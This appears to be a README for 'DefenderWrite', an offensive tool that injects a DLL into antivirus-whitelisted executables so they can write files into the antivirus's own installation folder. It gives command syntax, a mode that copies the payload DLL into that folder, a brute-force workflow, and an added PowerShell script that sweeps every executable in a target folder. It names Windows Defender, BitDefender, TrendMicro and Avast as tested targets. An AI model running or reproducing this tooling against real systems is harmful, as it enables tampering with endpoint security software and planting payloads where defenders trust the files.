
A tool that supports finding and abusing whitelisted programs to allow arbitrary file writing into the executable folder of Antivirus software


TwoSevenOneT/DefenderWrite


DefenderWrite

DefenderWrite brute-forces every executable in a specified folder to find binaries that the Antivirus whitelists and that are therefore allowed to write into the AV's own executable folder.

Command Line Syntax

DefenderWrite.exe <TargetExePath> <FullDLLPath> <FileToWrite>

DefenderWrite launches the executable at TargetExePath and injects the DLL at FullDLLPath into the newly created process. The DLL attempts to create FileToWrite from inside that process and reports success or failure.

DefenderWrite.exe <TargetExePath> <FullDLLPath> <FileToWrite> c

With the trailing c argument, DefenderWrite launches the executable at TargetExePath and injects the DLL at FullDLLPath as before, but the DLL copies FullDLLPath itself to the destination FileToWrite. Use this mode when you want to drop the payload into the Antivirus installation folder.

Brute-Force with Run-Check.ps1

Edit line 60 of Run-Check.ps1 to set the path to DefenderWrite.exe, FullDLLPath and FileToWrite for the environment you are testing.

CMD (RunAs Administrator)
powershell -c "path to Run-Check.ps1" > result.txt

Check the output log (result.txt) for executables whose result contains "successfully"; those are the whitelisted binaries that can write into the AV folder.
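The following PowerShell loop automates the sweep described above. It is an added example and not the project's Run-Check.ps1; every path, the per-target timeout and the CSV file name are assumptions to be adjusted for the environment under test. It relies only on the behaviour the README documents: DefenderWrite.exe is run once per candidate executable and a successful write is reported with the word "successfully".

```powershell
#Requires -RunAsAdministrator
# Added example (not part of the DefenderWrite project): run DefenderWrite.exe against
# every .exe under $CandidateDir and record which targets could write $FileToWrite.
# All default values below are assumptions; override them on the command line.
param(
    [string]$DefenderWrite = 'C:\Tools\DefenderWrite\DefenderWrite.exe',            # assumed path
    [string]$CandidateDir  = 'C:\Program Files\Windows Defender',                    # assumed folder to brute-force
    [string]$FullDLLPath   = 'C:\Tools\DefenderWrite\DefenderWrite.dll',            # assumed path
    [string]$FileToWrite   = 'C:\ProgramData\Microsoft\Windows Defender\test.txt',  # assumed marker file
    [int]$TimeoutSec       = 20,                                                     # assumed per-target limit
    [string]$ResultCsv     = (Join-Path $PWD 'result.csv')
)

$results = foreach ($exe in Get-ChildItem -Path $CandidateDir -Filter *.exe -Recurse -File) {
    $stdout = [System.IO.Path]::GetTempFileName()
    $stderr = [System.IO.Path]::GetTempFileName()

    # DefenderWrite.exe <TargetExePath> <FullDLLPath> <FileToWrite> (write mode, no trailing "c")
    $p = Start-Process -FilePath $DefenderWrite `
        -ArgumentList @("`"$($exe.FullName)`"", "`"$FullDLLPath`"", "`"$FileToWrite`"") `
        -RedirectStandardOutput $stdout -RedirectStandardError $stderr `
        -NoNewWindow -PassThru

    # Some targets never exit once a DLL is injected; do not let one hang stall the sweep.
    if (-not $p.WaitForExit($TimeoutSec * 1000)) {
        Stop-Process -Id $p.Id -Force -ErrorAction SilentlyContinue
        $status = 'timeout'
    } else {
        $out = (Get-Content $stdout -Raw) + (Get-Content $stderr -Raw)
        # The README says a successful write is reported with the word "successfully".
        $status = if ($out -match 'successfully') { 'success' } else { 'failed' }
    }
    Remove-Item $stdout, $stderr -ErrorAction SilentlyContinue

    [pscustomobject]@{ Target = $exe.FullName; Status = $status }
}

# Keep the full log for review, and print only the hits.
$results | Export-Csv -Path $ResultCsv -NoTypeInformation
$results | Where-Object Status -eq 'success' | Format-Table -AutoSize
```

Run it from an elevated prompt, e.g. `powershell -ExecutionPolicy Bypass -File .\Sweep.ps1 -CandidateDir 'C:\Program Files\SomeAV'`. Targets recorded as timeout are worth re-running by hand with the documented single-command syntax, since a hung process is not the same as a denied write.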

Antivirus products successfully tested

  • Microsoft Windows Defender
  • BitDefender Antivirus
  • TrendMicro Antivirus Plus
  • Avast Antivirus

Links

DefenderWrite: Abusing Whitelisted Programs for Arbitrary Writes

Fuel the Mission

We’re a team of researchers and developers keeping our lab running, renewing essential software licenses, upgrading aging equipment, and getting coffee to reduce stress. You can support us by buying a few books from our recommended list. Every purchase directly funds lab maintenance, software licenses, equipment upgrades, and provides very big morale boosts.

Books on Programming and Cybersecurity recommended by Zero Salarium Researchers

Author:

Two Seven One Three
